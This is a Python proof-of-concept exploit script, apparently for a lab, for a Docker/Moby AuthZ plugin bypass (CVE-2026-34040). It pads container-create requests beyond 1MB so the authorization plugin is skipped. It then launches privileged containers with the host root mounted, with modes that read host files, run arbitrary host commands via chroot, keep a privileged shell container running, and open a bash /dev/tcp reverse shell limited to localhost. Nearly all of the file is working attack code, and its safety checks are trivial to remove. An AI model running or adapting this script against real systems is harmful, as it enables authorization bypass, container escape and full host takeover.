#!/usr/bin/env python3 """ CVE-2026-34040 Lab PoC - Docker/Moby AuthZ plugin bypass via oversized request body. Verified facts: CVE : CVE-2026-34040 CVSS 3.1 : 8.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) CWE : CWE-288, CWE-863 Affected : moby/moby < 29.3.1, moby/moby/v2 < 2.0.0-beta.8 Fixed in : 29.3.1, 2.0.0-beta.8 Root cause : incomplete fix for CVE-2024-41110 Mechanism : a request body > maxBodySize (1MB in vulnerable versions) makes the daemon forward an EMPTY body to the AuthZ plugin while the daemon itself processes the full original request -> AuthZ bypass. Modes: check Compare small request vs oversized request. read-host-file Read a host file through privileged container + host bind mount. rce-proof Write a marker file on the host using chroot. host-command Run a user-provided command on the host through chroot. shell-container Create and start a long-running privileged container for manual chroot. reverse-shell-local Local lab reverse shell using host network mode. Scope limitations: - Local UNIX socket only (/var/run/docker.sock); matches the official AV:L (Local) vector. - No remote TCP Docker API support - No scanning - Intended for authorized lab environments only """ from __future__ import annotations import argparse import json import os import re import shlex import socket import sys import time from typing import Optional, Tuple DEFAULT_SOCKET = "/var/run/docker.sock" DEFAULT_API_VERSION = "v1.51" DEFAULT_IMAGE = "alpine" PADDING_SIZE = 1024 * 1024 + 1 LABEL_BASE = { "poc": "cve-2026-34040-full-lab", "lab_only": "true", } def oversized_labels() -> dict: labels = dict(LABEL_BASE) labels["padding"] = "A" * PADDING_SIZE return labels def docker_request( sock_path: str, method: str, path: str, body: bytes = b"", timeout: int = 20, ) -> Tuple[int, str, bytes]: if not os.path.exists(sock_path): raise FileNotFoundError(f"Docker socket not found: {sock_path}") req = ( f"{method} {path} HTTP/1.1\r\n" "Host: docker\r\n" "User-Agent: cve-2026-34040-full-lab-poc\r\n" "Content-Type: application/json\r\n" f"Content-Length: {len(body)}\r\n" "Connection: close\r\n" "\r\n" ).encode("utf-8") + body with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect(sock_path) s.sendall(req) chunks = [] while True: try: data = s.recv(65536) except socket.timeout: break if not data: break chunks.append(data) raw = b"".join(chunks) header, _, response_body = raw.partition(b"\r\n\r\n") status_line = header.split(b"\r\n", 1)[0].decode("latin-1", errors="replace") try: status_code = int(status_line.split()[1]) except Exception: status_code = 0 return status_code, status_line, response_body def json_body(payload: dict) -> bytes: return json.dumps(payload, separators=(",", ":")).encode("utf-8") def parse_json_response(body: bytes) -> dict: try: return json.loads(body.decode("utf-8", errors="replace")) except Exception: return {} def extract_container_id(body: bytes) -> Optional[str]: data = parse_json_response(body) cid = data.get("Id") if isinstance(cid, str) and cid: return cid return None def print_response(prefix: str, status_line: str, body: bytes, max_body: int = 400) -> None: print(f"{prefix}: {status_line}") if body: text = body[:max_body].decode("utf-8", errors="replace") print(f"{prefix} body: {text}") def create_container( sock: str, api: str, name: str, payload: dict, timeout: int, ) -> Tuple[int, str, bytes, Optional[str]]: path = f"/{api}/containers/create?name={name}" body = json_body(payload) status, line, resp = docker_request(sock, "POST", path, body, timeout) return status, line, resp, extract_container_id(resp) def start_container(sock: str, api: str, cid: str, timeout: int) -> Tuple[int, str, bytes]: return docker_request(sock, "POST", f"/{api}/containers/{cid}/start", b"", timeout) def logs_container(sock: str, api: str, cid: str, timeout: int) -> Tuple[int, str, bytes]: return docker_request( sock, "GET", f"/{api}/containers/{cid}/logs?stdout=true&stderr=true", b"", timeout, ) def remove_container(sock: str, api: str, cid: str, timeout: int) -> None: status, line, body = docker_request( sock, "DELETE", f"/{api}/containers/{cid}?force=true", b"", timeout, ) if status in (204, 404): print(f"[cleanup] removed or already gone: {cid[:12]}") else: print_response("[cleanup warning]", line, body) def wait_short() -> None: time.sleep(1.2) def require_explicit_host_execution(args: argparse.Namespace) -> None: if not args.i_understand_this_runs_on_host: print( "This mode can execute commands on the host in your lab.\n" "Re-run with --i-understand-this-runs-on-host if this is your authorized test VM.", file=sys.stderr, ) raise SystemExit(2) def build_check_payload(image: str, oversized: bool) -> dict: labels = oversized_labels() if oversized else dict(LABEL_BASE) return { "Image": image, "Cmd": ["true"], "HostConfig": { "Privileged": True }, "Labels": labels, } def mode_check(args: argparse.Namespace) -> int: unique = int(time.time()) small_name = f"cve-34040-small-{unique}" big_name = f"cve-34040-big-{unique}" print("=" * 72) print("CVE-2026-34040 AuthZ bypass check") print("=" * 72) small_payload = build_check_payload(args.image, oversized=False) big_payload = build_check_payload(args.image, oversized=True) print("[1] Small request: AuthZ should block this") print(f" payload size: {len(json_body(small_payload))} bytes") s_status, s_line, s_body, s_id = create_container( args.socket, args.api_version, small_name, small_payload, args.timeout ) print_response(" response", s_line, s_body) if s_id and not args.keep: remove_container(args.socket, args.api_version, s_id, args.timeout) print() print("[2] Oversized request: vulnerable target may pass AuthZ") print(f" payload size: {len(json_body(big_payload))} bytes") b_status, b_line, b_body, b_id = create_container( args.socket, args.api_version, big_name, big_payload, args.timeout ) print_response(" response", b_line, b_body) if b_id and not args.keep: remove_container(args.socket, args.api_version, b_id, args.timeout) print() print("=" * 72) print("Interpretation") print("=" * 72) if s_status != 403: print("[!] Baseline request was not blocked. AuthZ policy may not be enforcing privileged checks.") elif b_status == 403: print("[-] Oversized request was blocked. Target appears patched/protected.") elif b_status in (201, 404, 400, 409): print("[+] Bypass behavior observed: small request was denied, oversized request reached Docker processing.") if b_status == 404: print(" 404 usually means the image is missing. Run: sudo docker pull alpine") else: print("[?] Inconclusive. Review response details manually.") return 0 def mode_read_host_file(args: argparse.Namespace) -> int: unique = int(time.time()) name = f"cve-34040-read-{unique}" host_file = args.host_file if not host_file.startswith("/"): print("--host-file must be an absolute path like /etc/hostname", file=sys.stderr) return 2 # Avoid shell interpolation: pass file path directly to cat. payload = { "Image": args.image, "Cmd": ["cat", f"/host{host_file}"], "HostConfig": { "Privileged": True, "Binds": ["/:/host:ro"], }, "Labels": oversized_labels(), } print("=" * 72) print("CVE-2026-34040 impact demo: read host file") print("=" * 72) print(f"target host file: {host_file}") status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout) print_response("[create]", line, body) if not cid: print("No container was created.") return 1 print(f"[container] {cid}") start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout) print_response("[start]", start_line, start_body) wait_short() log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout) print_response("[logs]", log_line, log_body, max_body=4000) if not args.keep: remove_container(args.socket, args.api_version, cid, args.timeout) else: print(f"[keep] container kept: {cid}") return 0 def mode_rce_proof(args: argparse.Namespace) -> int: require_explicit_host_execution(args) unique = int(time.time()) name = f"cve-34040-rce-proof-{unique}" marker = "/tmp/cve_2026_34040_rce_proof" host_cmd = ( f"id > {shlex.quote(marker)}; " f"hostname >> {shlex.quote(marker)}; " f"whoami >> {shlex.quote(marker)}; " f"date >> {shlex.quote(marker)}" ) payload = { "Image": args.image, "Cmd": [ "/bin/sh", "-c", f"chroot /host /bin/bash -lc {shlex.quote(host_cmd)} && cat /host{marker}", ], "HostConfig": { "Privileged": True, "Binds": ["/:/host"], }, "Labels": oversized_labels(), } print("=" * 72) print("CVE-2026-34040 impact demo: host RCE proof") print("=" * 72) print(f"marker file on host: {marker}") status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout) print_response("[create]", line, body) if not cid: print("No container was created.") return 1 print(f"[container] {cid}") start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout) print_response("[start]", start_line, start_body) wait_short() log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout) print_response("[logs]", log_line, log_body, max_body=4000) print() print("Verify on host:") print(f" cat {marker}") print("Cleanup:") print(f" sudo rm -f {marker}") if not args.keep: remove_container(args.socket, args.api_version, cid, args.timeout) else: print(f"[keep] container kept: {cid}") return 0 def mode_host_command(args: argparse.Namespace) -> int: require_explicit_host_execution(args) if not args.cmd: print("--cmd is required for host-command mode", file=sys.stderr) return 2 unique = int(time.time()) name = f"cve-34040-host-cmd-{unique}" payload = { "Image": args.image, "Cmd": [ "/bin/sh", "-c", f"chroot /host /bin/bash -lc {shlex.quote(args.cmd)}", ], "HostConfig": { "Privileged": True, "Binds": ["/:/host"], }, "Labels": oversized_labels(), } print("=" * 72) print("CVE-2026-34040 impact demo: host command") print("=" * 72) print(f"command: {args.cmd}") status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout) print_response("[create]", line, body) if not cid: print("No container was created.") return 1 print(f"[container] {cid}") start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout) print_response("[start]", start_line, start_body) wait_short() log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout) print_response("[logs]", log_line, log_body, max_body=4000) if not args.keep: remove_container(args.socket, args.api_version, cid, args.timeout) else: print(f"[keep] container kept: {cid}") return 0 def mode_shell_container(args: argparse.Namespace) -> int: unique = int(time.time()) name = f"cve-34040-shell-{unique}" payload = { "Image": args.image, "Cmd": ["sleep", "infinity"], "HostConfig": { "Privileged": True, "Binds": ["/:/host"], }, "Labels": oversized_labels(), } print("=" * 72) print("CVE-2026-34040 impact demo: long-running privileged container") print("=" * 72) status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout) print_response("[create]", line, body) if not cid: print("No container was created.") return 1 start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout) print_response("[start]", start_line, start_body) print() print("[container]") print(cid) print() print("Manual demo commands:") print(f" sudo docker exec -it {cid} /bin/sh") print(" chroot /host /bin/bash") print(" id") print(" hostname") print(" whoami") print() print("Cleanup:") print(f" sudo docker rm -f {cid}") if not args.keep: print() print("[note] This mode is useful with --keep. Container is kept by default for this mode.") print(f"[keep] container kept: {cid}") return 0 def mode_reverse_shell_local(args: argparse.Namespace) -> int: require_explicit_host_execution(args) if args.lhost not in ("127.0.0.1", "localhost"): print( "reverse-shell-local only allows --lhost 127.0.0.1 or localhost.\n" "This is intentional so the packaged lab PoC stays local-only.", file=sys.stderr, ) return 2 if not (1 <= args.lport <= 65535): print("--lport must be between 1 and 65535", file=sys.stderr) return 2 unique = int(time.time()) name = f"cve-34040-revshell-local-{unique}" rev_cmd = f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1" payload = { "Image": args.image, "Cmd": [ "/bin/sh", "-c", f"chroot /host /bin/bash -lc {shlex.quote(rev_cmd)}", ], "HostConfig": { "Privileged": True, "Binds": ["/:/host"], "NetworkMode": "host", }, "Labels": oversized_labels(), } print("=" * 72) print("CVE-2026-34040 impact demo: local reverse shell") print("=" * 72) print("Before running this mode, open another terminal on the same VM:") print(f" nc -lvnp {args.lport}") print() print(f"reverse shell target: {args.lhost}:{args.lport}") status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout) print_response("[create]", line, body) if not cid: print("No container was created.") return 1 print(f"[container] {cid}") start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout) print_response("[start]", start_line, start_body) print() print("If listener is open, the shell should connect there.") print("Cleanup after demo:") print(f" sudo docker rm -f {cid}") if args.keep: print(f"[keep] container kept: {cid}") return 0 def build_parser() -> argparse.ArgumentParser: parser = argparse.ArgumentParser( description="CVE-2026-34040 full lab PoC over local Docker UNIX socket" ) parser.add_argument( "--mode", choices=[ "check", "read-host-file", "rce-proof", "host-command", "shell-container", "reverse-shell-local", ], default="check", help="PoC mode", ) parser.add_argument("--socket", default=DEFAULT_SOCKET, help="Docker UNIX socket path") parser.add_argument("--api-version", default=DEFAULT_API_VERSION, help="Docker API version, e.g. v1.51") parser.add_argument("--image", default=DEFAULT_IMAGE, help="Container image to use") parser.add_argument("--timeout", type=int, default=20, help="Socket timeout in seconds") parser.add_argument("--keep", action="store_true", help="Keep created containers where applicable") parser.add_argument("--host-file", default="/etc/hostname", help="Host file path for read-host-file mode") parser.add_argument("--cmd", help="Host command for host-command mode") parser.add_argument("--lhost", default="127.0.0.1", help="Local reverse shell host. Only 127.0.0.1/localhost allowed") parser.add_argument("--lport", type=int, default=4444, help="Local reverse shell port") parser.add_argument( "--i-understand-this-runs-on-host", action="store_true", help="Required for modes that execute commands on the host in the lab", ) return parser def main() -> int: args = build_parser().parse_args() if args.mode == "check": return mode_check(args) if args.mode == "read-host-file": return mode_read_host_file(args) if args.mode == "rce-proof": return mode_rce_proof(args) if args.mode == "host-command": return mode_host_command(args) if args.mode == "shell-container": return mode_shell_container(args) if args.mode == "reverse-shell-local": return mode_reverse_shell_local(args) print(f"Unknown mode: {args.mode}", file=sys.stderr) return 2 if __name__ == "__main__": try: raise SystemExit(main()) except PermissionError: print("Permission denied. Try sudo or an account that can access /var/run/docker.sock.", file=sys.stderr) raise SystemExit(1) except FileNotFoundError as e: print(str(e), file=sys.stderr) raise SystemExit(1)